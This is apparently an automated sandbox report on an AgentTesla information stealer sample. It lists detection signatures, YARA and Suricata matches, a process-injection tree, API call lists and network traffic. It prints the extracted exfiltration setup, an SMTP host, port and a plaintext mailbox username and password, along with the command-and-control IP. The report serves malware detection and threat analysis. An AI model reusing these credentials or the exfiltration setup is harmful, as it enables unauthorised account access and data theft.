Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uFzZ48M67c.exe

Overview

General Information

Sample name:uFzZ48M67c.exe
renamed because original name is a hash value
Original sample name:8c48688d795f1ff90fa87b1eafd94190518e4a850f5a9aa265350158c85cbc62.exe
Analysis ID:1528952
MD5:a441db009e52a518a60acf292302f8b9
SHA1:7b074fd716dad974e147dee21566d37878c909f4
SHA256:8c48688d795f1ff90fa87b1eafd94190518e4a850f5a9aa265350158c85cbc62
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • uFzZ48M67c.exe (PID: 6768 cmdline: "C:\Users\user\Desktop\uFzZ48M67c.exe" MD5: A441DB009E52A518A60ACF292302F8B9)
    • RegSvcs.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\uFzZ48M67c.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.flujoauditorias.cl", "Username": "nedufile1@flujoauditorias.cl", "Password": "l;0jGu7J;z_a                                                                                                                 "}
SourceRuleDescriptionAuthorStrings
00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            0.2.uFzZ48M67c.exe.16a0000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.uFzZ48M67c.exe.16a0000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                0.2.uFzZ48M67c.exe.16a0000.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.uFzZ48M67c.exe.16a0000.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x34930:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x349a2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x34a2c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x34abe:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x34b28:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x34b9a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x34c30:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x34cc0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.uFzZ48M67c.exe.16a0000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 6 entries

                    System Summary

                    barindex
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 15.235.118.15, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6988, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T14:08:10.937050+020020301711A Network Trojan was detected192.168.2.44973115.235.118.15587TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T14:08:14.849412+020028555421A Network Trojan was detected192.168.2.44973115.235.118.15587TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T14:08:10.937050+020028397231Malware Command and Control Activity Detected192.168.2.44973115.235.118.15587TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T14:08:10.937050+020028400321A Network Trojan was detected192.168.2.44973115.235.118.15587TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: uFzZ48M67c.exeAvira: detected
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.flujoauditorias.cl", "Username": "nedufile1@flujoauditorias.cl", "Password": "l;0jGu7J;z_a "}
                    Source: uFzZ48M67c.exeReversingLabs: Detection: 31%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: uFzZ48M67c.exeJoe Sandbox ML: detected
                    Source: uFzZ48M67c.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: uFzZ48M67c.exe, 00000000.00000003.1722530978.0000000004470000.00000004.00001000.00020000.00000000.sdmp, uFzZ48M67c.exe, 00000000.00000003.1722659698.0000000004610000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: uFzZ48M67c.exe, 00000000.00000003.1722530978.0000000004470000.00000004.00001000.00020000.00000000.sdmp, uFzZ48M67c.exe, 00000000.00000003.1722659698.0000000004610000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49731 -> 15.235.118.15:587
                    Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49731 -> 15.235.118.15:587
                    Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.4:49731 -> 15.235.118.15:587
                    Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49731 -> 15.235.118.15:587
                    Source: Yara matchFile source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 15.235.118.15:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: HP-INTERNET-ASUS HP-INTERNET-ASUS
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 15.235.118.15:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: mail.flujoauditorias.cl
                    Source: RegSvcs.exe, 00000001.00000002.2956839649.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://flujoauditorias.cl
                    Source: RegSvcs.exe, 00000001.00000002.2956839649.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2956839649.0000000003261000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2956839649.0000000003326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: uFzZ48M67c.exe, 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2956839649.0000000003261000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2956839649.0000000003326000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: RegSvcs.exe, 00000001.00000002.2956223533.000000000151E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostings
                    Source: RegSvcs.exe, 00000001.00000002.2956839649.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.flujoauditorias.cl
                    Source: RegSvcs.exe, 00000001.00000002.2956839649.0000000003261000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2956839649.0000000003326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: uFzZ48M67c.exe, 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, 5apE.cs.Net Code: LNXFf
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                    System Summary

                    barindex
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004096A00_2_004096A0
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0042200C0_2_0042200C
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0041A2170_2_0041A217
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004122160_2_00412216
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0042435D0_2_0042435D
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004033C00_2_004033C0
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0044F4300_2_0044F430
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004125E80_2_004125E8
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0044663B0_2_0044663B
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004138010_2_00413801
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0042096F0_2_0042096F
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004129D00_2_004129D0
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004119E30_2_004119E3
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0040FA100_2_0040FA10
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0044EB590_2_0044EB59
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00423C810_2_00423C81
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00411E780_2_00411E78
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00442E0C0_2_00442E0C
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00420EC00_2_00420EC0
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0044CF170_2_0044CF17
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00444FD20_2_00444FD2
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_03E836480_2_03E83648
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0175A5A81_2_0175A5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0175D8F81_2_0175D8F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01754AC01_2_01754AC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01753EA81_2_01753EA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017541F01_2_017541F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06A622F01_2_06A622F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06A677F01_2_06A677F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06A611401_2_06A61140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06A63A901_2_06A63A90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06A633A81_2_06A633A8
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: String function: 004115D7 appears 36 times
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: String function: 00416C70 appears 39 times
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: String function: 00445AE0 appears 65 times
                    Source: uFzZ48M67c.exe, 00000000.00000003.1721356510.0000000004593000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs uFzZ48M67c.exe
                    Source: uFzZ48M67c.exe, 00000000.00000003.1721896788.000000000473D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs uFzZ48M67c.exe
                    Source: uFzZ48M67c.exe, 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed8fb262b-d302-4a02-903f-dc5dd7d227b7.exe4 vs uFzZ48M67c.exe
                    Source: uFzZ48M67c.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, kPa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, kPa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, kPa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, kPa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, xdFgn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, xdFgn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, zI2.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.uFzZ48M67c.exe.16a0000.1.raw.unpack, zI2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@2/2
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeFile created: C:\Users\user\AppData\Local\Temp\lardsJump to behavior
                    Source: uFzZ48M67c.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 00000001.00000002.2956839649.000000000335D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: uFzZ48M67c.exeReversingLabs: Detection: 31%
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeFile read: C:\Users\user\Desktop\uFzZ48M67c.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\uFzZ48M67c.exe "C:\Users\user\Desktop\uFzZ48M67c.exe"
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\uFzZ48M67c.exe"
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\uFzZ48M67c.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\uFzZ48M67c.exeSection loaded: winmm.dllJump to behavior
